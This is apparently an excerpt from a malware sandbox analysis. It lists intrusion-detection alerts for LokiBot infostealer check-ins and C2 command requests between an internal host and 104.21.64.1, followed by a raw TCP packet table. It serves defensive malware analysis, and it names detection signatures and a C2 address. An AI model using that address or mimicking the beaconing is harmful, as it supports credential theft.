2025-02-20T03:44:54.030291+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:54.035383+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50053	TCP
2025-02-20T03:44:55.447771+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:55.447771+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:55.447771+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:56.235776+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:56.242976+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50056	TCP
2025-02-20T03:44:57.397582+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:57.397582+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:57.397582+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:58.216631+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:58.222823+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50057	TCP
2025-02-20T03:44:59.369050+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:44:59.369050+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:44:59.369050+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:00.181510+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:00.186635+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50058	TCP
2025-02-20T03:45:01.395935+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:01.395935+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:01.395935+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:02.154762+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:02.160343+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50059	TCP
2025-02-20T03:45:03.336005+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:03.336005+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:03.336005+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:04.177292+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:04.188919+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50060	TCP
2025-02-20T03:45:05.459884+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:05.459884+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:05.459884+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:06.106556+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:06.111884+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50061	TCP
2025-02-20T03:45:07.274491+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:07.274491+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:07.274491+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:08.243365+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:10.160329+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:12.131378+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:12.136494+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50064	TCP
2025-02-20T03:45:13.295502+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:13.295502+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:13.295502+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:14.083485+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:14.088586+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50065	TCP
2025-02-20T03:45:15.286586+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:15.286586+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:15.286586+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:16.100549+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50066	104.21.64.1	80	TCP
2025-02-20T03:45:16.105934+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.64.1	80	192.168.2.4	50066	TCP
2025-02-20T03:45:17.298173+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50067	104.21.64.1	80	TCP
2025-02-20T03:45:17.298173+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50067	104.21.64.1	80	TCP
2025-02-20T03:45:17.298173+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50067	104.21.64.1	80	TCP
2025-02-20T03:45:18.101250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50067	104.21.64.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2025 03:43:14.520634890 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:14.525825024 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:14.525935888 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:14.527729988 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:14.532831907 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:14.532929897 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:14.537996054 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:15.323247910 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:15.323417902 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:15.324186087 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:15.324245930 CET	49731	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:15.329921961 CET	80	49731	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:16.452344894 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:16.457642078 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:16.457729101 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:16.473067999 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:16.478965044 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:16.479029894 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:16.484528065 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.388662100 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.388824940 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.389904976 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.389976025 CET	49732	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.393966913 CET	80	49732	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.438942909 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.444108009 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.444298983 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.446084023 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.451406002 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:17.451575041 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:17.456621885 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:18.278176069 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:18.278237104 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:18.278302908 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:18.278359890 CET	49733	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:18.285090923 CET	80	49733	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:19.429105043 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:19.434511900 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:19.434591055 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:19.436868906 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:19.441970110 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:19.442017078 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:19.447031975 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:20.266947985 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:20.267190933 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:20.267674923 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:20.267736912 CET	49734	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:20.272239923 CET	80	49734	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:21.758496046 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:21.763823032 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:21.763905048 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:21.766257048 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:21.771346092 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:21.771429062 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:21.776541948 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:22.574636936 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:22.574775934 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:22.575284004 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:22.575368881 CET	49735	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:22.580508947 CET	80	49735	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:23.713989973 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:23.721154928 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:23.721236944 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:23.722965956 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:23.729943991 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:23.729996920 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:23.736990929 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:24.489306927 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:24.489415884 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:24.491131067 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:24.491185904 CET	49736	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:24.496598959 CET	80	49736	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:25.638648033 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:25.644197941 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:25.644299030 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:25.645998001 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:25.651058912 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:25.651125908 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:25.656189919 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:26.463025093 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:26.463190079 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:26.464051962 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:26.464102983 CET	49737	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:26.470268965 CET	80	49737	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:27.740406990 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:27.745573997 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:27.745659113 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:27.747466087 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:27.752650023 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:27.752712965 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:27.758343935 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:28.504662037 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:28.504762888 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:28.505197048 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:28.505253077 CET	49738	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:28.511096001 CET	80	49738	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:29.646959066 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:29.652359009 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:29.652452946 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:29.654202938 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:29.660480022 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:29.660542965 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:29.665663958 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:30.375478983 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:30.375586033 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:30.375616074 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:30.375701904 CET	49741	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:30.380817890 CET	80	49741	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:31.509757996 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:31.514930010 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:31.514997005 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:31.516771078 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:31.521857023 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:31.521909952 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:31.526936054 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:32.301815987 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:32.302083969 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:32.303030014 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:32.303684950 CET	49745	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:32.309782982 CET	80	49745	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:33.442800045 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:33.449378014 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:33.449455976 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:33.451307058 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:33.456435919 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:33.456489086 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:33.461515903 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:34.207351923 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:34.207473040 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:34.207807064 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:34.207858086 CET	49747	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:34.214416981 CET	80	49747	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:35.351172924 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:35.356359005 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:35.356437922 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:35.358187914 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:35.363276958 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:35.363344908 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:35.368339062 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:36.139050007 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:36.139358997 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:36.139523983 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:36.139790058 CET	49748	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:36.144500971 CET	80	49748	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:37.290888071 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:37.296156883 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:37.296257973 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:37.298062086 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:37.303061008 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:37.303124905 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:37.308116913 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:38.070710897 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:38.070830107 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:38.071363926 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:38.071424961 CET	49749	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:38.075913906 CET	80	49749	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.193353891 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.198513031 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.198713064 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.200334072 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.205442905 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.205647945 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.210704088 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.936440945 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.936583996 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.937345982 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:39.937410116 CET	49750	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:39.941623926 CET	80	49750	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.122317076 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.127460957 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.127554893 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.129297018 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.134327888 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.134380102 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.139343977 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.914738894 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.914799929 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:41.914923906 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.914923906 CET	49751	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:41.920221090 CET	80	49751	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.071953058 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.078968048 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.082654953 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.085863113 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.092834949 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.094784021 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.101803064 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.907433033 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.907573938 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.908482075 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:43.908523083 CET	49752	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:43.912590027 CET	80	49752	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.090369940 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.095470905 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.095539093 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.097601891 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.102668047 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.102722883 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.107729912 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.838972092 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.839242935 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.839556932 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:45.839623928 CET	49753	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:45.844263077 CET	80	49753	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:46.982934952 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:46.989191055 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:46.989281893 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:46.991051912 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:46.997163057 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:46.997245073 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:47.003268957 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:47.712637901 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:47.712754011 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:47.713078976 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:47.713154078 CET	49754	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:47.717725992 CET	80	49754	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:48.850588083 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:48.857314110 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:48.857386112 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:48.859348059 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:48.866208076 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:48.866259098 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:48.873116970 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:49.660723925 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:49.660952091 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:49.661859989 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:49.661914110 CET	49755	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:49.667999029 CET	80	49755	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:50.803113937 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:50.810252905 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:50.810343027 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:50.812558889 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:50.819837093 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:50.820013046 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:50.826107979 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:51.567676067 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:51.567801952 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:51.568017960 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:51.568070889 CET	49756	80	192.168.2.4	104.21.64.1
Feb 20, 2025 03:43:51.573697090 CET	80	49756	104.21.64.1	192.168.2.4
Feb 20, 2025 03:43:52.709480047 CET	49757	80	192.168.2.4	104.21.64.1
